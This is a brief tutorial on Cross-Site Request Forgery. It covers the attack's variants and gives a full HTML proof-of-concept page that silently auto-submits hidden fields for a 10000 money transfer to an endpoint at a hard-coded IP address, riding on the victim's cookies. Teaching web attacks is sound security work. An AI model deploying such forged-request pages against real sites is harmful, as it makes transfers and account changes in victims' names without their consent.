CSRF


Cross-Site Request Forgery (CSRF)

CSRF, in full Cross Site Request Forgery, is easily confused with XSS. The two key points of CSRF are that the request is cross-site and that the request is forged: because the target site has no token or Referer defense, an attacker can learn every parameter of a user's sensitive operation, and can then forge an identical request that is carried out under the user's identity to achieve a malicious goal.

By request type, CSRF can be divided into GET-based and POST-based variants.

By attack technique, it can be divided into HTML CSRF, JSON hijacking, Flash CSRF, and so on.

  • HTML CSRF

    Using a form to forge a POST-based request:

    <!--click.html-->

    <html>
    <body>
    <h1>
    This page forges an HTTP POST request.
    </h1>
    <script type="text/javascript">
    function post(url, fields) {
    // create a <form> element.
    var p = document.createElement("form");
    // construct the form: target URL, hidden inputs, POST method.
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    // append the form to the current page.
    document.body.appendChild(p);
    // submit the form; the browser attaches the victim's cookies automatically.
    p.submit();
    }

    function csrf_hack() {
    // start from an empty string; an uninitialized variable would
    // prepend the text "undefined" to the form markup.
    var fields = "";
    // The following are form entries that need to be filled out
    // by attackers. The entries are made hidden, so the victim
    // won't be able to see them.
    fields += "<input type='hidden' name='target' value='aaaaaa'>";
    fields += "<input type='hidden' name='money' value='10000'>";
    fields += "<input type='hidden' name='messages' value='test'>";
    post('http://173.82.206.142:8005/transfer.php', fields);
    }
    // invoke csrf_hack() after the page is loaded.
    window.onload = function() {
    csrf_hack();
    }
    </script>
    </body>
    </html>